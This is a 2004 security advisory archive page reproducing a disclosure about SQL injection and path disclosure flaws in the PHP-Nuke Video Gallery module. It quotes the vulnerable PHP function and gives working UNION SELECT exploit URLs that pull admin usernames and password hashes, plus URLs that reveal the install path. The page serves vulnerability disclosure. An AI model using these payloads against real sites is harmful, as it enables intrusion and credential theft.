Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Engorile Video Gallery Insufficient Input Validation in 'clipid' and 'catid' Lets Remote Users Inject SQL Commands
|
|
SecurityTracker Alert ID: 1009951
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Apr 27 2004
|
Original Entry Date: Apr 27 2004
|
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
|
Exploit Included: Yes
|
Version(s): 0.1 Beta 5
|
Description: DarkBicho reported several vulnerabilities in Engorile Video Gallery. A remote user can inject SQL commands to be executed by the underlying database. A remote user can also determine the installation path.
It is reported that the software does not properly validate user-supplied input in the 'catid' and 'clipid' parameters. A remote
user can submit a specially crafted URL to execute arbitrary SQL commands on the target system. The flaw reportedly resides in
the render_detail_clip() function. Some demonstration exploit URLs are provided:
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELE
CT%20pwd%20FROM%20nuke_authors&catid=1
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
http://[tar
get]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
http://[target]/modules.php?name=Video_Gallery&l_op=v
oteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
It is also reported that a remote user can determine the
installation path by submitting an invalid value for the 'catid' or 'clipid' parameter. Some demonstration exploit URLs are provided:
http://[target]/modules.php?name
=Video_Gallery&l_op=viewcat&catid=darkbicho
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1
The
vendor has reportedly been notified.
|
Impact: A remote user can inject SQL commands to be executed on the database. This can be used, for example, to retrieve usernames and hashed password values.
A remote user can determine the installation path.
|
Solution: No solution was available at the time of this entry. The vendor reportedly plans to issue a fix.
|
Vendor URL: videogallery.engorile.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "k1LL3r B0y" <k1ll3rb0y@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 26 Apr 2004 23:59:41 +0200
From: "k1LL3r B0y" <k1ll3rb0y@hotmail.com>
Subject: [Full-Disclosure] Multiple vulnerabilities PHP-Nuke Video Gallery Module for PHP-Nuke
|
Adivore: http://bichosoft.webcindario.com/advisory-03.txt
===========================================================================
=================== Multiple vulnerabilities PHP-Nuke =====================
=================== Video Gallery Module for PHP-Nuke =====================
PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke
HOMEPAGE: http://videogallery.engorile.com/
VERSION: 0.1 Beta 5
BUG: Multiple vulnerabilities
DATE: 26/04/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
===========================================================================
===========================================================================
Vulnerabilities:
---------------
1.- CODE:
จจจจ
================================ CODE ===================================
function render_detail_clip($clipid, $catid){
global $prefix, $dbi, $module_name;
$tipomime="application/unknown";
$next=next_clips($clipid, $catid);
$result=sql_query("select descripcion, url_thumb, url_preview, accesos from
".$prefix."_videos_clips where clipid=$clipid", $dbi);
list($descripcion, $url_thumb, $url_preview,
$accesos)=sql_fetch_row($result, $dbi);
$resultado=AbreTabla();
if ($next["previous"]){
$resultado.="<a
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&
catid=$catid>"._PREVIOUS."</a>";
}
$resultado.="</td><td align=right>";
if ($next["next"]){
$resultado.="<a
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&
catid=$catid>"._NEXT."</a>";
}
$resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>"
;
if ($url_preview != ""){
$tipomime=tipomime($clipid, "clips");
$result2=sql_query("select class_id, options_object, options_embed from
".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);
list($class_id, $options_object, $options_embed)=sql_fetch_row($result2,
$dbi);
$resultado.="<center>".mete_video($url_preview, $tipomime, 160,
120)."</center>";
}
else{
$resultado.="<center><img src=\"$url_thumb\"></center>";
}
$resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);
if (count_total($clipid, "clip", "ficheros") > 0){
$resultado.=CierraTabla().AbreTabla().clip_files($clipid,
$catid).CierraTabla();
}
else{
$resultado.=CierraTabla();
}
$accesos++;
sql_query("update ".$prefix."_videos_clips set accesos=$accesos where
clipid=$clipid", $dbi);
return "$resultado";
=========================================================================
2.- Full path disclosure:
จจจจจจจจจจจจจจจจจจจจ
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286
B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL
result resource in
/home/hosting/php-nuke/includes/sql_layer.php on line 286
3.- Sql injection:
จจจจจจจจจจจจจจ
This sql injection exploit can pull out from database any information,
for example
superadmin's username and password's md5 hash:
A)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd
%20FROM%20nuke_authors&catid=1
B)
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%2
0FROM%20nuke_authors
c)
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20nam
e%20FROM%20nuke_authors&catid=1
D)
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd
%20FROM%20nuke_authors&catid=1
SOLUTION:
จจจจจจจจ
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.
_________________________________________________________________
Charla con tus amigos en lํnea mediante MSN Messenger:
http://messenger.latam.msn.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
Go to the Top of This SecurityTracker Archive Page
|
